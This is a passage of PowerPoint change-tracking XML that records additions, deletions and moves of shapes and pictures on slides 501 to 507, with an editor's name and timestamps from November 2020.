          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:41:44.689" v="5203" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="222881260" sldId="501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2T06:46:37.697" v="5242" actId="1037"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="222881260" sldId="501"/>
            <ac:picMk id="3" creationId="{FD6CAE49-0520-458D-80C0-C1550B76D986}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:39:51.067" v="5170" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="222881260" sldId="501"/>
            <ac:picMk id="15" creationId="{D222CF1A-2D67-4581-AAD9-5668513C2C50}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:39:50.379" v="5169" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="222881260" sldId="501"/>
            <ac:picMk id="19" creationId="{495BF136-8C56-4C16-AFC6-6174C73E3C4D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:12:25.483" v="3358" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1911167219" sldId="502"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T11:09:24.528" v="1770" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911167219" sldId="502"/>
            <ac:picMk id="3" creationId="{E8F92DA6-B930-4F15-8957-88DD14C63489}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T16:31:04.150" v="2627" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911167219" sldId="502"/>
            <ac:picMk id="4" creationId="{3A932683-787F-4E19-A442-C225A936434D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T16:31:10.759" v="2630" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911167219" sldId="502"/>
            <ac:picMk id="10" creationId="{783D0306-0C16-4030-AE93-EC6B465A3ED0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T16:30:50.277" v="2622" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1911167219" sldId="502"/>
            <ac:picMk id="12" creationId="{D34FB582-870E-4041-AFB0-3D675AED344E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg modAnim modNotes">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:01:39.999" v="5643" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2013467184" sldId="503"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T11:26:08.561" v="1898" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2013467184" sldId="503"/>
            <ac:spMk id="6" creationId="{CB1691EB-F716-4FE9-B496-79294B857826}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T11:26:04.970" v="1897" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2013467184" sldId="503"/>
            <ac:spMk id="7" creationId="{FA44948E-DF98-45A5-963E-D49C99F8D1EB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:01:39.999" v="5643" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2013467184" sldId="503"/>
            <ac:spMk id="8" creationId="{F4B89F0F-B755-49AC-977E-940DA40DACB4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:00:29.888" v="5606" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2013467184" sldId="503"/>
            <ac:spMk id="24" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T11:17:41.693" v="1802" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2013467184" sldId="503"/>
            <ac:picMk id="3" creationId="{B7C33839-8E89-4043-90B8-97969392A7CA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:01:35.191" v="5635" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2013467184" sldId="503"/>
            <ac:picMk id="5" creationId="{64913603-EC3C-481A-8A4F-C1B89AF2F05F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T11:23:58.529" v="1833" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2013467184" sldId="503"/>
            <ac:picMk id="1026" creationId="{4FD85E29-A516-4474-BD3A-1A08129CE57C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T11:22:23.390" v="1816"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2013467184" sldId="503"/>
            <ac:picMk id="1028" creationId="{20B3C0A3-00C6-4AE9-A37F-EAA273D166E1}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T11:23:16.892" v="1818"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2013467184" sldId="503"/>
            <ac:picMk id="1030" creationId="{C6F52B47-F61C-4D7D-9419-EF9642B7EDF3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T11:24:39.380" v="1840" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2013467184" sldId="503"/>
            <ac:picMk id="1032" creationId="{03FF7F0C-963E-40C8-A27B-2122E7F43ADB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T11:24:41.946" v="1841" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2013467184" sldId="503"/>
            <ac:picMk id="1034" creationId="{7A2CA5F6-91B7-42FE-A54E-473A615C610A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T11:24:38.996" v="1839"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2013467184" sldId="503"/>
            <ac:picMk id="1036" creationId="{6F826F43-BD67-42D3-AEF2-0EA2A2D3394C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T11:24:48.465" v="1844" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2013467184" sldId="503"/>
            <ac:picMk id="1038" creationId="{B1712541-9CC2-4458-91CE-8EEF454D8765}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg modAnim modNotes">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:00:37.856" v="5608" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3965634647" sldId="504"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:12:02.192" v="3356" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3965634647" sldId="504"/>
            <ac:spMk id="2" creationId="{6F533BCE-5ACA-4148-808A-F9C7A6FA9BA0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:58:06.260" v="3176" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3965634647" sldId="504"/>
            <ac:spMk id="10" creationId="{E8D436E4-62F9-48E0-B663-A5ACDE1D6A7C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:11:58.229" v="3355" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3965634647" sldId="504"/>
            <ac:spMk id="11" creationId="{EA60D34C-5430-40B5-A3D4-06C48E5B9431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16" creationId="{665B5403-5225-40A2-AE80-CAAB31D0391C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17" creationId="{C96FD867-D2C9-4E63-9C4F-42B605706956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18" creationId="{82A60E48-393F-4841-9D65-9A22D2F9C426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19" creationId="{FC04C29C-FAB5-4227-810C-72BF8EFE5C34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20" creationId="{AF25F76F-0BC5-4E91-8768-47ECF375FCD9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21" creationId="{275D036A-7A76-4D53-8F24-F4D66B95F378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22" creationId="{1D9DB21D-A1EE-460B-B060-355D2EB56361}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:10:38.121" v="3209"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3965634647" sldId="504"/>
            <ac:spMk id="23" creationId="{BF73A4F4-EB23-43B6-86EC-B4CB3867026B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:00:37.856" v="5608" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3965634647" sldId="504"/>
            <ac:spMk id="24" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:10:38.121" v="3209"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3965634647" sldId="504"/>
            <ac:grpSpMk id="15" creationId="{BEAF610C-B1F8-48D9-82F0-35E2A60BF5FB}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:42:50.657" v="3166"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3965634647" sldId="504"/>
            <ac:picMk id="4" creationId="{D4570729-9CE4-484A-B525-CFE589E22680}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:58:35.700" v="3180" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3965634647" sldId="504"/>
            <ac:picMk id="7" creationId="{0CF567A2-4843-4948-A093-F68B5CD6BB46}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:09:23.731" v="3207" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3965634647" sldId="504"/>
            <ac:picMk id="9" creationId="{05D784DE-F42A-41A7-AE82-F73F117D6A57}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg modAnim modNotes">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:00:04.400" v="5602" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2933492279" sldId="505"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T11:41:11.193" v="1963"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:spMk id="4" creationId="{6AFA603D-0D6E-4D75-BCD1-D672A781030A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T11:41:00.976" v="1961"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:spMk id="5" creationId="{3E4FC053-43EA-4873-9C66-FA36D8CC6225}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:18:45.125" v="3451" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:spMk id="6" creationId="{79723E47-5FC8-41C7-9FD2-390D3F664DDA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:17:59.262" v="3449" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:spMk id="12" creationId="{092409CB-B0EF-4468-8C72-CCA55451C76C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:54:30.915" v="5488" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:spMk id="13" creationId="{526AF2E6-E492-453C-B88D-6AB53EF4D948}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:20:07.554" v="3525" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:spMk id="14" creationId="{16EBBE46-CDF8-4B92-B435-6C07D5000A6B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:54:46.778" v="5492" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:spMk id="15" creationId="{90516FC7-9F48-4576-941B-8A8769D7C741}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:55:32.042" v="5498" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:spMk id="16" creationId="{F807F0B4-240C-4B9C-A27B-8A7487075DE5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:57:33.361" v="5557" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:spMk id="17" creationId="{65B569ED-2166-478D-9566-999FAAEE5F3B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:00:04.400" v="5602" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505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1T03:18:49.840" v="3454" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:picMk id="3" creationId="{71C2FD26-238F-4162-9FC2-4FD14838D2A1}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:34:50.216" v="3148"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:picMk id="4" creationId="{D0F5E3F6-0D7A-4BDB-BCC1-09D2A55EB8EB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:40:33.473" v="3164" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:picMk id="7" creationId="{55C08156-41BD-452B-98E4-8217475FDB82}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:52:14.419" v="3170" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:picMk id="9" creationId="{29409BBE-8216-41A8-BEFD-ACCE6A549AD6}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:17:59.262" v="3449" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:picMk id="11" creationId="{5C766249-9DA3-4EE2-9642-120B58E8BD99}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:37:00.804" v="3150"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:picMk id="2050" creationId="{96ED7B07-A346-487C-AFA9-AFF42F9005CB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:37:15.213" v="3152"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:picMk id="2052" creationId="{D614ABFA-407B-4A6D-8E6D-09A2FDDDAA15}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T02:53:27.634" v="3173" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2933492279" sldId="505"/>
            <ac:picMk id="2054" creationId="{84680747-5501-4587-BC7D-D97E76D670FB}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg modNotes">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:00:50.728" v="5614" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1903664892" sldId="506"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:00:50.728" v="5614" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1903664892" sldId="506"/>
            <ac:spMk id="24" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:27:29.961" v="5017" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1903664892" sldId="506"/>
            <ac:picMk id="3" creationId="{2C94A065-28FC-4675-B8EB-D0B888D355AE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:27:33.905" v="5019" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1903664892" sldId="506"/>
            <ac:picMk id="4" creationId="{58568BCD-7873-4DEC-9B80-FDA7DCBE3D8F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:20:33.366" v="3528" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1903664892" sldId="506"/>
            <ac:picMk id="5" creationId="{0055A2E4-A0E9-4A8E-BAFE-74AE302AF783}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod ord setBg modAnim">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:04:08.063" v="5699"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="854990038" sldId="507"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T08:55:20.705" v="4107" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="854990038" sldId="507"/>
            <ac:spMk id="3" creationId="{B06A0E30-E86A-41D8-8740-BCF067E0CA84}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T12:17:16.493" v="2086" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="854990038" sldId="507"/>
            <ac:spMk id="5" creationId="{FDC8EE58-1359-4F0B-9388-46149F54B2EE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T12:16:44.809" v="2080" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="854990038" sldId="507"/>
            <ac:spMk id="7" creationId="{78B9C51E-5361-4DDE-8002-8A1A9BD24BB3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T12:17:35.937" v="2094" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="854990038" sldId="507"/>
            <ac:spMk id="8" creationId="{B4949C29-E5A0-483D-8E6D-F3191461DF33}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:01:05.153" v="5622" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="854990038" sldId="507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0T12:16:22.634" v="2074" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="854990038" sldId="507"/>
            <ac:picMk id="2" creationId="{2228814C-6C33-4E79-A393-F901BDE8B32A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T12:17:22.089" v="2089" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="854990038" sldId="507"/>
            <ac:picMk id="4" creationId="{0376456F-1C5B-4708-87AA-DE9571B47603}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod setBg modAnim">
